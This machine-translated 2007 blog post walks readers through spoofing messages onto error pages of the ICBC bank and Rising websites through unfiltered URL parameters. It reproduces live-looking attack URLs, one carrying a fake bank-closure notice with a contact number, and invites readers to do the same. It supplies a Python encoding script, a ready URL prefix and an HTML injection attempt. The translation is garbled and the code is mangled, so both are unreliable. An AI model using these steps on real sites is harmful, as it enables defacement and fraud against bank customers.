Working Principle and attack program of ICBC and rising hacking

How ICBC and rising are hacked and attackedProgram

The Industrial and Commercial Bank of China (ICBC) and rising's websites have been attacked one after another. Although it is not a serious attack, it is still full of spoof atmosphere. For example, ICBC's attacked address is as follows:

Http://www.icbc.com.cn/news/hotspot.jsp? Column = % c4 % Aa % B7 % C7 % CC % E1 % D0 % D1 % A3 % Ba % B9 % F3 % D5 % be % B4 % E6 % D4 % da % d1 % CF % D6 % D8 % B0 % B2 % C8 % AB % Ce % Ca % CC % E2 % A3 % AC % C8 % E7 % D0 % ed % BD % E2 % Be % F6 % C7 % EB % C1 % Aa % CF % b5qq % A3 % ba7540734 % A3 % AC % CB % F7 % C8 % a1 % BB % E3 % BF % ee % D5 % Ca % Ba % C5 % a1 % a32006 % c4 % ea12 % D4 % c229 % Ba % C5

It has been repaired after testing. Rising's attacked address is as follows:

Http://buy.rising.com.cn/bank/Errorpage.aspx? MSG = % C8 % F0 % D0 % C7 % D2 % B2 % B2 % BB % B9 % fd % C8 % E7 % B4 % CB % A3 % AC % Ba % D9 % Ba % D9 % A3 % a1 % D5 % D5 % D1 % F9 % B1 % BB % Ba % da % A3 % a1 % B3 % B9 % B5 % D7 % B5 % c4 % Cd % EA % B5 % B0 % C1 % CB % A3 % AC % B2 % BB % D4 % B8 % D4 % B1 % B9 % A4 % B6 % BC % CC % F8 % B2 % db % c4 % D8 % A3 % BF % a1 % a1 % a1 % a1 % A3 % E2 % A3 % F9 % a1 % a1 % 44% 75% 6f % 6e

It's still a shame.

A Web Developer can see at a glance that this is done by passing parameters to the error display or information display page through URL. These pages often read an input parameter and display it on the page. Currently, many web development frameworks do not differentiate the parameters passed by get and post, which leads to the above-mentioned spof vulnerability. In fact, these vulnerabilities only allow the use of URL-based parameters to display odd information on the page. (By gashero) for example, ICBC has been spoofed to say it is about to be closed. Please transfer deposits and so on.

After understanding the principles, we can also perform such attacks on our own. First, sort out the URL containing the passed parameters and extract the content before the parameter, that is, remove the characters such as %. Then you can add the information you want to display. But in fact, this half will fail, and it is okay to pass the English language, but there will be some strange Chinese problems.

This is because most HTTP servers do not allow non-ASCII characters to be transmitted through URLs. A few can be configured to allow transmission, which is rare. In addition, it is difficult to transmit non-display strings, such as spaces.

In fact, there is a way to pass non-ASCII strings through URLs. Half is encoded by quote and converted to a byte starting with % plus a 2-bit hexadecimal encoding. In this way, any symbols can be passed theoretically. For example, if you pass a space of % 20, you can see this frequently, including the search results in some search engines.

Another problem is Chinese encoding. Two common Chinese codes are GBK and UTF-8. Gb2312 encoding is a subset of GBK, so it is also included in GBK encoding. These two types of codes are incompatible. Therefore, you must first determine the default encoding used by the website to encode Chinese characters and quote the encoding.

The following is a program that can encode the input string with quotes, during which UTF-8 encoding is also enforced. Because most websites in China use UTF-8 encoding. Windows's default encoding is GBK, so in the program from GBK encoding to UTF-8 encoding after the quote encoding. The string returned by the program is the odd string that contains %. You can add it to the URL and allow passing parameters.

According to the test, Rising's website uses gb2312 encoding (by gashero). Therefore, readers can convert the encoding statements in the program by themselves.

MSG = Unicode (MSG, "GBK"). encode ("UTF-8 ")

Comment out, that is, add "#" before this statement "#". Then you can perform Quote Encoding on your own.

For example, if we start the program and input the string "rising is not good ". The resulting code is

% E7 % 91% 9e % E6 % 98% 9f % E4 % B9 % 9f % E4 % B8 % 8d % E8 % a1 % 8C % E5 % 95% 8a

Of course, it is not feasible to directly add this string, and it is garbled. We need to modify the program first, no UTF-8 encoding. The modified encoding is as follows:

% C8 % F0 % D0 % C7 % D2 % B2 % B2 % BB % D0 % D0 % B0 % A1

Modify the URL of the website as follows:

Http://buy.rising.com.cn/bank/Errorpage.aspx? MSG = % C8 % F0 % D0 % C7 % D2 % B2 % B2 % BB % D0 % D0 % B0 % A1

Enter the above URL in the address bar to view the selected statement. Of course, you can change it to any form if you want. You only need to add the obtained encoding with the following URL prefix:

Http://buy.rising.com.cn/bank/Errorpage.aspx? MSG =

To obtain the encoding character set of a specific website, click the page to viewSource codeTo search for the following words:

<Meta http-equiv = "Content-Type" content = "text/html; charset = gb2312">

In this example, gb2312 is the Chinese encoding character set. You can determine whether to comment out the conversion encoding statement in the program based on this setting.

Quote Encoding ProgramCode(Python ):

#-*-Coding: GBK -*-
# File: toquote. py
# Date: 2007-1-18
# Author: gashero
# Copyright @ 1999-2007, Harry gashero Liu.

"""
Script for generating quote encoded strings that can be transmitted through URLs
You can encode multiple symbols including Chinese characters and special characters.
Before encoding, all codes are converted from GBK encoding to UTF-8 encoding, which can adapt to the default encoding of most web applications.
"""

Import urllib
Import msvcrt

MSG = raw_input ('input your message :')
# MSG = Unicode (MSG, "GBK"). encode ("UTF-8 ")
Retstr = ""
For CH in MSG:
Ch = hex (ord (CH) [2:]
Retstr + = "%" + CH
Print retstr
Print "Press [any] key to exit! "
Msvcrt. getch ()

Just now, I wanted to bring up a special effect (by gashero) on Rising's error page, that is, the following code:

<Marquee> neither does rising. </marquee>

After transcoding:

% 3C % 6D % 61% 72% 71% 75% 65% 3E % C8 % F0 % D0 % C7 % D2 % B2 % B2 % BB % D0 % D0 % B0 % a1 % 3C % 2f % 6D % 61% 72% 7
1% 75% 65% 65% 3E

It is a pity that the. NET error configuration file has been created. As follows:

Server Error in '/bank' application.
Runtime error
Description: An application error occurred on the server. the current custom error settings for this application prevent the details of the application error from being viewed remotely (for security reasons ). it cocould, however, be viewed by browsers running on the local server machine.

Details: To enable the details of this specific error message to be viewable on remote machines, Please create a <customerrors> tag within a "Web. config "configuration file located in the root directory of the current web application. this <customerrors> tag shoshould then have its "Mode" attribute set to "off ".

<! -- Web. config configuration file -->

<Configuration>
<System. Web>
<Customerrors mode = "off"/>
</System. Web>
</Configuration>

Notes: the current error page you are seeing can be replaced by a custom error page by modifying the "defaultredirect" attribute of the application's <customerrors> Configuration tag to point to a custom error page url.

<! -- Web. config configuration file -->

<Configuration>
<System. Web>
<Customerrors mode = "remoteonly" defaultredirect = "mycustompage.htm"/>
</System. Web>
</Configuration>

I hope rising will make persistent efforts.

 1 #-*-coding: GBK-*-
 2 # file: toquote. PY 
 3 # Date: 2007-1-18 
 4 # Author: gashero 
 5 # copyright @ 1999-2007, Harry gashero Liu. 
 6 
 7 "
 8. A Quote Encoding string script generated by a string that can be transmitted through a URL 
 9 can contain Chinese characters and special characters. symbols and other symbols before encoding 
 10 are all converted from GBK encoding to UTF-8 encoding, applicable to the default encoding of most web applications 
 11 "
 12 
 13 Import urllib 
 14 Import msvcrt 
 15 
 16 msg = raw_input ('input your message: ') 
 17 # msg = Unicode (MSG, "GBK "). encode ("UTF-8") 
 18 retstr = "" 
 19  for  CH  in  MSG: 
 20 CH = hex (ord (CH) [2:] 
 21 retstr + = "%" + CH 
 22  Print  retstr 
 23  Print  "Press [any] key to exit! "
 24 msvcrt. getch ()